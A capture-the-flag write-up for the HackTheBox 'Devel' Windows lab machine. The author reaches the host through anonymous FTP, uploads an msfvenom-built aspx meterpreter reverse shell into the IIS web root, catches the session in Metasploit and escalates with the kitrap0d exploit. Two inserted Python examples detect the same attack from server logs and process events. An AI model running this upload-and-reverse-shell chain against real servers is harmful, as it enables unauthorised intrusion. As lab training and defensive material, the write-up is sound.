HackTheBox WriteUp: Devel

This is the third HackTheBox machine I have worked on.
Like the previous one it was a Windows machine, but frankly I lacked the skills and could barely make any progress on my own.
Because of that, I mostly followed the walkthrough below:
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

I wonder if I will eventually be able to solve machines like this by myself...

1. Enumeration
As always, I started with nmap.

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ sudo nmap -sS -sV -A -p 0-20000 --script vuln -T5 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 21:14 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 19999 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
80/tcp open  http    Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   139.20 ms 10.10.14.1
2   365.20 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 737.76 seconds

Two services were identified:
21/TCP FTP (Microsoft ftpd)
80/TCP HTTP (Microsoft IIS 7.5)


Since an HTTP service was running, I browsed to http://10.10.10.5 and the following page was displayed:
[screenshot of the page served at http://10.10.10.5]


2. Gaining access
I tried to gain access through the services identified above.

For FTP, I first tested whether it was possible to log in with simple usernames.

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 


kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

As a result, logging in with ftp/ftp succeeded.
Logging in as anonymous also succeeded.

Since a web server was also running (and the FTP listing showed the IIS default files iisstart.htm and welcome.png, which suggests the FTP root is the web root),
I decided to combine FTP with the web server to plant a reverse shell.

The payload used for the reverse shell
was generated with msfvenom.

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.9 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2834 bytes
Saved as: devel.aspx

I uploaded it to the target machine over FTP.

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put devel.aspx
local: devel.aspx remote: devel.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2870 bytes sent in 0.00 secs (23.5952 MB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
06-30-20  12:41AM                 2870 devel.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

Then, on the Metasploit side, I set up a handler and established the reverse shell connection.

kali@kali:~/SyachinekoLab/workspace/HTB/Devel$ msfconsole 
[!] The following modules were loaded with warnings:
[!]     /usr/share/metasploit-framework/modules/exploits/19671.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.
                                                  
     ,           ,
    /             \                                                                                                                                        
   ((__---,,,---__))                                                                                                                                       
      (_) O O (_)_________                                                                                                                                 
         \ _ /            |\                                                                                                                               
          o_o \   M S F   | \                                                                                                                              
               \   _____  |  *                                                                                                                             
                |||   WW|||                                                                                                                                
                |||     |||                                                                                                                                
                                                                                                                                                           

       =[ metasploit v5.0.85-dev                          ]
+ -- --=[ 2003 exploits - 1093 auxiliary - 342 post       ]
+ -- --=[ 560 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload 
Display all 519 possibilities? (y or n)
msf5 exploit(multi/handler) > set payload windows/meterpreter
set payload windows/meterpreter/bind_hidden_ipknock_tcp    set payload windows/meterpreter/reverse_nonx_tcp
set payload windows/meterpreter/bind_hidden_tcp            set payload windows/meterpreter/reverse_ord_tcp
set payload windows/meterpreter/bind_ipv6_tcp              set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/bind_ipv6_tcp_uuid         set payload windows/meterpreter/reverse_tcp_allports
set payload windows/meterpreter/bind_named_pipe            set payload windows/meterpreter/reverse_tcp_dns
set payload windows/meterpreter/bind_nonx_tcp              set payload windows/meterpreter/reverse_tcp_rc4
set payload windows/meterpreter/bind_tcp                   set payload windows/meterpreter/reverse_tcp_rc4_dns
set payload windows/meterpreter/bind_tcp_rc4               set payload windows/meterpreter/reverse_tcp_uuid
set payload windows/meterpreter/bind_tcp_uuid              set payload windows/meterpreter/reverse_winhttp
set payload windows/meterpreter/reverse_hop_http           set payload windows/meterpreter/reverse_winhttps
set payload windows/meterpreter/reverse_http               set payload windows/meterpreter_bind_named_pipe
set payload windows/meterpreter/reverse_http_proxy_pstore  set payload windows/meterpreter_bind_tcp
set payload windows/meterpreter/reverse_https              set payload windows/meterpreter_reverse_http
set payload windows/meterpreter/reverse_https_proxy        set payload windows/meterpreter_reverse_https
set payload windows/meterpreter/reverse_ipv6_tcp           set payload windows/meterpreter_reverse_ipv6_tcp
set payload windows/meterpreter/reverse_named_pipe         set payload windows/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.9:1234 
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.9:1234 -> 10.10.10.5:49163) at 2020-06-26 09:56:55 -0400

meterpreter > 

Note that while the handler was waiting for a session,
I opened http://10.10.10.5/devel.aspx in a browser, which is what triggered the reverse shell.

I ran the following commands to look around, but did not find anything useful.
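From the defender's side, the chain above (an anonymous FTP write into the IIS web root followed by an HTTP request that executes the uploaded .aspx) is visible in the server's own logs. The following Python is an added example, not code from this writeup or the walkthrough it references; the log lines are constructed to mimic IIS 7.5 W3C FTP and HTTP logs, the parser reads the field layout from the #Fields: header, and the set of usernames treated as anonymous is an assumption.

```python
"""Correlate anonymous FTP uploads of script files with later HTTP requests
to the same path. Sample logs are constructed, not real server output."""
from datetime import datetime, timedelta
import posixpath

SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".ascx"}  # executed by IIS, not served as-is
ANON_USERS = {"anonymous", "ftp"}   # assumption: names the FTP service treats as anonymous
WINDOW = timedelta(minutes=30)      # max gap between upload and first request

FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2020-06-30 00:40:58 10.10.14.9 - 10.10.10.5 21 USER ftp 331 0 0 1 -
2020-06-30 00:40:59 10.10.14.9 ftp 10.10.10.5 21 PASS *** 230 0 0 1 /
2020-06-30 00:41:02 10.10.14.9 ftp 10.10.10.5 21 STOR devel.aspx 226 0 0 1 /devel.aspx
2020-06-30 00:41:05 10.10.14.9 ftp 10.10.10.5 21 NLST - 226 0 0 1 /
2020-06-30 00:45:10 10.10.14.9 ftp 10.10.10.5 21 STOR notes.txt 226 0 0 1 /notes.txt
"""
HTTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-06-30 00:39:00 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 15
2020-06-30 00:41:40 10.10.10.5 GET /devel.aspx - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 1203
2020-06-30 00:46:00 10.10.10.5 GET /notes.txt - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 3
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))


def _ts(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def anonymous_script_uploads(ftp_text):
    """Successful STOR commands by an anonymous user that wrote a script file."""
    uploads = []
    for rec in parse_w3c(ftp_text):
        if rec["cs-method"] != "STOR" or not rec["sc-status"].startswith("2"):
            continue
        if rec["cs-username"].lower() not in ANON_USERS:
            continue
        path = rec["x-fullpath"] if rec["x-fullpath"] != "-" else "/" + rec["cs-uri-stem"]
        if posixpath.splitext(path)[1].lower() in SCRIPT_EXTS:
            uploads.append({"when": _ts(rec), "path": path, "client": rec["c-ip"]})
    return uploads


def correlate(ftp_text, http_text, window=WINDOW):
    """Pair each anonymous script upload with HTTP requests for that path inside the window."""
    findings = []
    uploads = anonymous_script_uploads(ftp_text)
    for req in parse_w3c(http_text):
        t = _ts(req)
        for up in uploads:
            # Windows paths are case-insensitive, so compare lower-cased
            if req["cs-uri-stem"].lower() == up["path"].lower() and up["when"] <= t <= up["when"] + window:
                findings.append({"path": up["path"], "uploaded_by": up["client"],
                                 "uploaded_at": up["when"], "requested_at": t,
                                 "requester": req["c-ip"], "status": req["sc-status"]})
    return findings


if __name__ == "__main__":
    for f in correlate(FTP_LOG, HTTP_LOG):
        print(f"ALERT: {f['path']} uploaded anonymously by {f['uploaded_by']} at "
              f"{f['uploaded_at']} and requested by {f['requester']} at {f['requested_at']}")
```

The notes.txt upload is ignored because a plain text file is served, not executed; the fix on the server side is to deny anonymous write access or point the FTP site at a directory outside the web root.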

meterpreter > search -f user.txt
No files matching your search were found.
meterpreter > shell
Process 3820 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          29/6/2020, 11:07:23 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 688 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.525 MB
Virtual Memory: In Use:    522 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

c:\windows\system32\inetsrv>

3. Privilege escalation
I used Metasploit to check whether privilege escalation was possible.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run 

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > 

Of these, I used exploit/windows/local/ms10_015_kitrap0d to escalate privileges.

meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > show sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  3         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL  10.10.14.9:1234 -> 10.10.10.5:49157 (10.10.10.5)

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.9       yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 3
session => 3
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.9:1234 
[*] Launching notepad to host the exploit...
[+] Process 1672 launched.
[*] Reflectively injecting the exploit DLL into 1672...
[*] Injecting exploit into 1672 ...
[*] Exploit injected. Injecting payload into 1672...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.9:1234 -> 10.10.10.5:49158) at 2020-06-26 10:38:36 -0400

meterpreter > ls
Listing: c:\windows\system32\inetsrv
====================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  138752   fil   2009-07-13 20:11:35 -0400  AppHostNavigators.dll
100777/rwxrwxrwx  125440   fil   2009-07-13 20:10:51 -0400  InetMgr.exe
100666/rw-rw-rw-  126976   fil   2009-07-13 18:39:34 -0400  Microsoft.Web.Administration.dll
100666/rw-rw-rw-  1048576  fil   2009-07-13 18:39:42 -0400  Microsoft.Web.Management.dll
100666/rw-rw-rw-  137728   fil   2009-07-13 20:11:35 -0400  XPath.dll
100777/rwxrwxrwx  155648   fil   2009-07-13 20:11:25 -0400  appcmd.exe
100666/rw-rw-rw-  3654     fil   2009-06-10 17:17:16 -0400  appcmd.xml
100666/rw-rw-rw-  61440    fil   2009-07-13 20:11:12 -0400  apphostsvc.dll
100666/rw-rw-rw-  313856   fil   2009-07-13 20:11:17 -0400  appobj.dll
100666/rw-rw-rw-  389632   fil   2009-07-13 20:11:14 -0400  asp.dll
100666/rw-rw-rw-  22196    fil   2009-07-13 17:04:57 -0400  asp.mof
100777/rwxrwxrwx  195584   fil   2009-07-13 20:11:42 -0400  aspnetca.exe
100666/rw-rw-rw-  22528    fil   2009-07-13 20:10:58 -0400  asptlb.tlb
100666/rw-rw-rw-  32256    fil   2009-07-13 20:11:17 -0400  authanon.dll
100666/rw-rw-rw-  48640    fil   2009-07-13 20:11:01 -0400  browscap.dll
100666/rw-rw-rw-  33404    fil   2017-03-17 10:37:32 -0400  browscap.ini
100666/rw-rw-rw-  17408    fil   2009-07-13 20:11:22 -0400  cachfile.dll
100666/rw-rw-rw-  44544    fil   2009-07-13 20:11:28 -0400  cachhttp.dll
100666/rw-rw-rw-  10240    fil   2009-07-13 20:11:27 -0400  cachtokn.dll
100666/rw-rw-rw-  9728     fil   2009-07-13 20:11:27 -0400  cachuri.dll
100666/rw-rw-rw-  43520    fil   2009-07-13 20:11:22 -0400  compstat.dll
40777/rwxrwxrwx   4096     dir   2017-03-17 10:37:32 -0400  config
100666/rw-rw-rw-  41984    fil   2009-07-13 20:11:21 -0400  custerr.dll
100666/rw-rw-rw-  19456    fil   2009-07-13 20:11:22 -0400  defdoc.dll
100666/rw-rw-rw-  23552    fil   2009-07-13 20:11:22 -0400  dirlist.dll
40777/rwxrwxrwx   4096     dir   2017-03-17 10:37:32 -0400  en-US
100666/rw-rw-rw-  55808    fil   2009-07-13 20:11:24 -0400  filter.dll
100666/rw-rw-rw-  16384    fil   2009-07-13 20:11:29 -0400  ftpconfigext.dll
100666/rw-rw-rw-  9728     fil   2009-07-13 20:11:28 -0400  ftpctrlps.dll
100666/rw-rw-rw-  10240    fil   2009-07-13 20:11:29 -0400  ftpmib.dll
100666/rw-rw-rw-  14848    fil   2009-07-13 20:11:29 -0400  ftpres.dll
100666/rw-rw-rw-  308224   fil   2009-07-13 20:11:36 -0400  ftpsvc.dll
100666/rw-rw-rw-  69252    fil   2009-07-13 18:40:37 -0400  ftpsvc.mof
100666/rw-rw-rw-  27136    fil   2009-07-13 20:10:58 -0400  gzip.dll
100666/rw-rw-rw-  22528    fil   2009-07-13 20:11:09 -0400  httpmib.dll
100666/rw-rw-rw-  12800    fil   2009-07-13 20:11:17 -0400  hwebcore.dll
100666/rw-rw-rw-  63105    fil   2009-07-13 18:39:38 -0400  iis.msc
100666/rw-rw-rw-  197632   fil   2009-07-13 20:11:24 -0400  iiscore.dll
100666/rw-rw-rw-  89088    fil   2009-07-13 20:11:33 -0400  iisreg.dll
100666/rw-rw-rw-  12288    fil   2009-07-13 20:11:26 -0400  iisreqs.dll
100666/rw-rw-rw-  220160   fil   2009-07-13 20:11:11 -0400  iisres.dll
100777/rwxrwxrwx  30720    fil   2009-07-13 20:11:04 -0400  iisrstas.exe
100777/rwxrwxrwx  240128   fil   2009-07-13 20:11:45 -0400  iissetup.exe
100666/rw-rw-rw-  59904    fil   2009-07-13 20:11:36 -0400  iissyspr.dll
100666/rw-rw-rw-  205824   fil   2009-07-13 20:11:15 -0400  iisutil.dll
100666/rw-rw-rw-  396288   fil   2009-07-13 20:11:15 -0400  iisw3adm.dll
100666/rw-rw-rw-  106496   fil   2009-07-13 20:11:24 -0400  isapi.dll
100666/rw-rw-rw-  19456    fil   2009-07-13 20:11:23 -0400  loghttp.dll
100666/rw-rw-rw-  39424    fil   2009-07-13 20:11:26 -0400  modrqflt.dll
100666/rw-rw-rw-  363008   fil   2009-07-13 20:11:24 -0400  nativerd.dll
100666/rw-rw-rw-  19968    fil   2009-07-13 20:11:24 -0400  protsup.dll
100666/rw-rw-rw-  26624    fil   2009-07-13 20:11:11 -0400  rsca.dll
100666/rw-rw-rw-  49664    fil   2009-07-13 20:11:14 -0400  rscaext.dll
100666/rw-rw-rw-  37888    fil   2009-07-13 20:11:28 -0400  static.dll
100666/rw-rw-rw-  18944    fil   2009-07-13 20:11:22 -0400  validcfg.dll
100666/rw-rw-rw-  9216     fil   2009-07-13 20:11:07 -0400  w3ctrlps.dll
100666/rw-rw-rw-  30208    fil   2009-07-13 20:11:09 -0400  w3ctrs.dll
100666/rw-rw-rw-  24064    fil   2009-07-13 20:11:18 -0400  w3dt.dll
100666/rw-rw-rw-  15872    fil   2009-07-13 20:11:15 -0400  w3tp.dll
100777/rwxrwxrwx  20480    fil   2009-07-13 20:11:23 -0400  w3wp.exe
100666/rw-rw-rw-  55296    fil   2009-07-13 20:11:16 -0400  w3wphost.dll
100666/rw-rw-rw-  23552    fil   2009-07-13 20:11:13 -0400  wbhst_pm.dll
100666/rw-rw-rw-  24064    fil   2009-07-13 20:11:09 -0400  wbhstipm.dll
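
Everything in this section runs out of the IIS worker process: the session is IIS APPPOOL\Web inside w3wp.exe, the `shell` command spawned cmd.exe from it, and the kitrap0d module launched notepad.exe to host the exploit. A worker process spawning a shell or an editor is a strong endpoint signal. The following Python is an added example, not code from this writeup; the events are constructed in the shape of Sysmon process-creation records (Event ID 1 field names), and the list of children the ASP.NET runtime legitimately spawns is an assumption.

```python
"""Flag unexpected child processes of the IIS worker process (w3wp.exe).
Events are constructed samples, not real Sysmon output."""
import ntpath

# Assumption: ASP.NET dynamic compilation legitimately runs these from w3wp.exe.
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe"}
# Interactive shells and script hosts a worker process should never spawn.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
APPPOOL_PREFIX = "iis apppool\\"

EVENTS = [  # constructed sample events
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "User": r"IIS APPPOOL\Web", "CommandLine": "csc.exe /noconfig /t:library ..."},
    {"Image": r"C:\Windows\System32\cmd.exe",            # meterpreter `shell`
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "User": r"IIS APPPOOL\Web", "CommandLine": "cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",        # kitrap0d host process
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "User": r"IIS APPPOOL\Web", "CommandLine": "notepad.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",            # a user opening a prompt
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"DEVEL\babis", "CommandLine": "cmd.exe"},
]


def classify(event):
    """Return (severity, reason), or None when the event is not interesting."""
    child = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    user = event.get("User", "").lower()
    # Either the parent is the worker itself or the child runs as an app-pool identity
    from_worker = parent == "w3wp.exe" or user.startswith(APPPOOL_PREFIX)
    if not from_worker or child in EXPECTED_CHILDREN:
        return None
    if child in SHELLS:
        return ("high", f"{parent} spawned shell {child} as {event['User']}")
    return ("medium", f"{parent} spawned unexpected {child} as {event['User']}")


def triage(events):
    """Return a finding per suspicious event, in input order."""
    findings = []
    for e in events:
        verdict = classify(e)
        if verdict:
            findings.append({"image": e["Image"], "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f['severity']}] {f['reason']}")
```

The cmd.exe launched by babis from explorer.exe is not reported, so the rule keys on the parent and the app-pool identity rather than on the child name alone.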

After that, I searched for user.txt and root.txt and found them.

meterpreter > cd /
meterpreter > ls
Listing: c:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
40777/rwxrwxrwx     0                  dir   2009-07-13 22:36:15 -0400        $Recycle.Bin
40777/rwxrwxrwx     0                  dir   2009-07-14 00:53:55 -0400        Documents and Settings
40777/rwxrwxrwx     0                  dir   2009-07-13 22:37:05 -0400        PerfLogs
40555/r-xr-xr-x     4096               dir   2009-07-13 22:37:05 -0400        Program Files
40777/rwxrwxrwx     4096               dir   2009-07-13 22:37:05 -0400        ProgramData
40777/rwxrwxrwx     0                  dir   2017-03-17 10:17:30 -0400        Recovery
40777/rwxrwxrwx     8192               dir   2017-03-17 07:09:34 -0400        System Volume Information
40555/r-xr-xr-x     4096               dir   2009-07-13 22:37:05 -0400        Users
40777/rwxrwxrwx     16384              dir   2009-07-13 22:37:05 -0400        Windows
100777/rwxrwxrwx    24                 fil   2009-07-13 22:04:04 -0400        autoexec.bat
100666/rw-rw-rw-    10                 fil   2009-07-13 22:04:04 -0400        config.sys
40777/rwxrwxrwx     4096               dir   2017-03-17 10:37:31 -0400        inetpub
57211620/rw--w----  59948775560478703  fif   1908705379-07-18 19:36:16 -0500  pagefile.sys

meterpreter > cd Users 
lmeterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd babis 
lmeterpreter > ls
Listing: c:\Users\babis
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  AppData
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Application Data
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:44 -0400  Contacts
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Cookies
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Desktop
40555/r-xr-xr-x   4096    dir   2017-03-17 10:17:40 -0400  Documents
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Downloads
40555/r-xr-xr-x   4096    dir   2017-03-17 10:17:40 -0400  Favorites
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Links
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Music
